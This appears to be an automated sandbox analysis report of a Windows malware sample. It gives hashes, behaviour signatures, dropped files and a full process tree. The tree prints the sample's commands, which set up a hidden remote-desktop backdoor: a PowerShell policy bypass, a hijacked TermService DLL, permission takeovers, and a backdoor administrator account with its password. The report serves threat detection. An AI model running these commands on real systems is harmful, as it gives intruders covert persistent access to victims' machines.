Analysis

  • max time kernel
    56s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    23-05-2022 21:16

General

  • Target

    7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe

  • Size

    3.4MB

  • MD5

    c53305cbf3645ab5c84469b892058413

  • SHA1

    0a08890c0e5c082ff135fc5df493c346335bdba5

  • SHA256

    7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c

  • SHA512

    b9b35d0f26e456c826623de80c084f3fbd523f9c3cd9e5230150e45508c1a128d1f19a7786b1ebf4008705a7843a36ec0c0c084b870c2258d8238cdb4bb30f88

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Possible privilege escalation attempt 8 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe
    "C:\Users\Admin\AppData\Local\Temp\7c961f8e57636ca32887de923cda6c6a733ec4a2f549ebe10e94b5b75029bd5c.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4116
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4248
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4360
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
          4⤵
            PID:4412
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            4⤵
            • Modifies registry key
            PID:2220
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            4⤵
              PID:3976
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:4208
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:728
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:4564
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:4580
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:3304
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1096
            • C:\Windows\system32\icacls.exe
              "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:1448
            • C:\Windows\system32\takeown.exe
              "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:4576
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              4⤵
                PID:5072
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  5⤵
                    PID:308
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  4⤵
                    PID:1040
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                    4⤵
                      PID:888
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                      4⤵
                        PID:4688
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                        4⤵
                          PID:4216
                  • C:\Windows\system32\timeout.exe
                    timeout -t 15
                    1⤵
                    • Delays execution with timeout.exe
                    PID:4728
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 start rdpdr
                    1⤵
                      PID:4440
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      1⤵
                        PID:3220
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start rdpdr
                        1⤵
                          PID:3152
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start TermService
                          1⤵
                            PID:432
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe user wgautilacc Ghar4f5 /del
                            1⤵
                              PID:4596
                              • C:\Windows\system32\net.exe
                                net.exe user wgautilacc Ghar4f5 /del
                                2⤵
                                  PID:1652
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 user wgautilacc gCLJ4u2E /add
                                1⤵
                                  PID:980
                                • C:\Windows\system32\net.exe
                                  net.exe user wgautilacc gCLJ4u2E /add
                                  1⤵
                                    PID:3652
                                  • C:\Windows\system32\net.exe
                                    net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
                                    1⤵
                                      PID:4020
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
                                        2⤵
                                          PID:1108
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe user wgautilacc gCLJ4u2E
                                        1⤵
                                          PID:1472
                                          • C:\Windows\system32\net.exe
                                            net.exe user wgautilacc gCLJ4u2E
                                            2⤵
                                              PID:1732
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user wgautilacc gCLJ4u2E
                                            1⤵
                                              PID:3388
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                              1⤵
                                                PID:1820
                                              • C:\Windows\system32\net.exe
                                                net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                1⤵
                                                  PID:852
                                                • C:\Windows\System32\cmd.exe
                                                  cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                  1⤵
                                                    PID:1912
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD
                                                    1⤵
                                                      PID:3536
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                      1⤵
                                                        PID:2904
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                        1⤵
                                                          PID:3076
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                          1⤵
                                                            PID:1936
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd /C net.exe user wgautilacc gCLJ4u2E /add
                                                            1⤵
                                                              PID:2892
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                                              1⤵
                                                                PID:4092
                                                              • C:\Windows\system32\net.exe
                                                                net start TermService
                                                                1⤵
                                                                  PID:376
                                                                • C:\Windows\system32\cmd.exe
                                                                  cmd /c net start TermService
                                                                  1⤵
                                                                    PID:1744

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v6

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • C:\Users\Admin\AppData\Local\Temp\11.ps1

                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    c0fae5b04f67d12ca621200aac5378dc

                                                                    SHA1

                                                                    c82c80ff2a2abb57e9a23ac5a100d82c1d551238

                                                                    SHA256

                                                                    de678dd80006ed864550a034f48a93bf1cb5a31d706d6f25694f577f7867f2a0

                                                                    SHA512

                                                                    27e1c30a1ad0ab381f037eb4313f11c9c7c3eaa78b5893ba0df04cac006a4169c92d3c6f3b09d181c6862491f8793818d0e9becf355b9aa4a70bef199c536ff8

                                                                  • C:\Users\Admin\AppData\Local\Temp\evil.ps1

                                                                    Filesize

                                                                    300KB

                                                                    MD5

                                                                    9a84ff18f0bc611158cea8aa0604bb0d

                                                                    SHA1

                                                                    85bce44b346881c3bda10e8cdb3facce7dabd2e4

                                                                    SHA256

                                                                    bb9daa0cede4d1a7246d4ea8fdb5a1a1105677b2db0bdb167bae3c6218792943

                                                                    SHA512

                                                                    4585bef776461049d917d2e593847a0d2f6617bf065391626de216d76175324d3fa479f874bbfeba20abe5b6aa04d10df3c36032f725d25b6b45caffb89d92e6

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\System.dll

                                                                    Filesize

                                                                    11KB

                                                                    MD5

                                                                    fbe295e5a1acfbd0a6271898f885fe6a

                                                                    SHA1

                                                                    d6d205922e61635472efb13c2bb92c9ac6cb96da

                                                                    SHA256

                                                                    a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

                                                                    SHA512

                                                                    2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\blowfish.dll

                                                                    Filesize

                                                                    22KB

                                                                    MD5

                                                                    5afd4a9b7e69e7c6e312b2ce4040394a

                                                                    SHA1

                                                                    fbd07adb3f02f866dc3a327a86b0f319d4a94502

                                                                    SHA256

                                                                    053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

                                                                    SHA512

                                                                    f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

                                                                  • C:\Users\Admin\AppData\Local\Temp\nsy9E49.tmp\nsUnzip.dll

                                                                    Filesize

                                                                    146KB

                                                                    MD5

                                                                    77a26c23948070dc012bba65e7f390aa

                                                                    SHA1

                                                                    7e112775770f9b3b24e2a238b5f7c66f8802e5d8

                                                                    SHA256

                                                                    4e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43

                                                                    SHA512

                                                                    2e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065

                                                                  • C:\Windows\Branding\mediasrv.png

                                                                    Filesize

                                                                    54KB

                                                                    MD5

                                                                    acc5f33ea59a3aceb71f356e818aa32e

                                                                    SHA1

                                                                    483682b15fa526f620e525292a26c868fd809769

                                                                    SHA256

                                                                    56fb4078bce366f84deb9236987465ac616717da91edb409344bdbec5f8969d9

                                                                    SHA512

                                                                    14676268e9a25ae1fae66b758ac508f1e18ef520af044d8626b6c2be48bdcc5d7983d12fbeb112c06e7b1f24bdc3c6edd57a2aa6c91b40fbe38ea93a0956cd44

                                                                  • C:\Windows\Branding\mediasvc.png

                                                                    Filesize

                                                                    605KB

                                                                    MD5

                                                                    ae5ca4c711ac6645927c516c0f9f1c8d

                                                                    SHA1

                                                                    63ced5bfc231e8c72bef1eacb81c7afa717021c3

                                                                    SHA256

                                                                    a27f2bba416d4a0aec01624ccc5c47bb075b8b154050c0c5a9d4b9f28f376ba7

                                                                    SHA512

                                                                    46f5bc589b99feac984d0447856524e8e821ad5031d29d0e49f1fc56793240b0ef0f01a555f0407c5438832bd00c07e8a2a3844a8105d88a44b833a9dbf4d147

                                                                  • C:\Windows\system32\rfxvmt.dll

                                                                    Filesize

                                                                    40KB

                                                                    MD5

                                                                    dc39d23e4c0e681fad7a3e1342a2843c

                                                                    SHA1

                                                                    58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                    SHA256

                                                                    6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                    SHA512

                                                                    5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                  • memory/308-163-0x0000000000000000-mapping.dmp

                                                                  • memory/376-170-0x0000000000000000-mapping.dmp

                                                                  • memory/432-171-0x0000000000000000-mapping.dmp

                                                                  • memory/728-157-0x0000000000000000-mapping.dmp

                                                                  • memory/852-182-0x0000000000000000-mapping.dmp

                                                                  • memory/888-188-0x0000000000000000-mapping.dmp

                                                                  • memory/980-177-0x0000000000000000-mapping.dmp

                                                                  • memory/1040-164-0x0000000000000000-mapping.dmp

                                                                  • memory/1096-153-0x0000000000000000-mapping.dmp

                                                                  • memory/1108-181-0x0000000000000000-mapping.dmp

                                                                  • memory/1448-152-0x0000000000000000-mapping.dmp

                                                                  • memory/1652-174-0x0000000000000000-mapping.dmp

                                                                  • memory/1732-184-0x0000000000000000-mapping.dmp

                                                                  • memory/1744-169-0x0000000000000000-mapping.dmp

                                                                  • memory/1820-183-0x0000000000000000-mapping.dmp

                                                                  • memory/2220-160-0x0000000000000000-mapping.dmp

                                                                  • memory/2904-179-0x0000000000000000-mapping.dmp

                                                                  • memory/3076-178-0x0000000000000000-mapping.dmp

                                                                  • memory/3152-165-0x0000000000000000-mapping.dmp

                                                                  • memory/3220-166-0x0000000000000000-mapping.dmp

                                                                  • memory/3304-154-0x0000000000000000-mapping.dmp

                                                                  • memory/3388-185-0x0000000000000000-mapping.dmp

                                                                  • memory/3652-176-0x0000000000000000-mapping.dmp

                                                                  • memory/3976-159-0x0000000000000000-mapping.dmp

                                                                  • memory/4020-180-0x0000000000000000-mapping.dmp

                                                                  • memory/4092-175-0x0000000000000000-mapping.dmp

                                                                  • memory/4116-132-0x00000000022B1000-0x00000000022B5000-memory.dmp

                                                                    Filesize

                                                                    16KB

                                                                  • memory/4208-158-0x0000000000000000-mapping.dmp

                                                                  • memory/4216-168-0x0000000000000000-mapping.dmp

                                                                  • memory/4248-144-0x0000000000000000-mapping.dmp

                                                                  • memory/4360-147-0x000001AB92BC0000-0x000001AB92BE2000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                  • memory/4360-149-0x00007FFF18EF0000-0x00007FFF199B1000-memory.dmp

                                                                    Filesize

                                                                    10.8MB

                                                                  • memory/4360-146-0x0000000000000000-mapping.dmp

                                                                  • memory/4412-161-0x0000000000000000-mapping.dmp

                                                                  • memory/4440-167-0x0000000000000000-mapping.dmp

                                                                  • memory/4564-156-0x0000000000000000-mapping.dmp

                                                                  • memory/4576-150-0x0000000000000000-mapping.dmp

                                                                  • memory/4580-155-0x0000000000000000-mapping.dmp

                                                                  • memory/4688-187-0x0000000000000000-mapping.dmp

                                                                  • memory/4728-145-0x0000000000000000-mapping.dmp

                                                                  • memory/5072-162-0x0000000000000000-mapping.dmp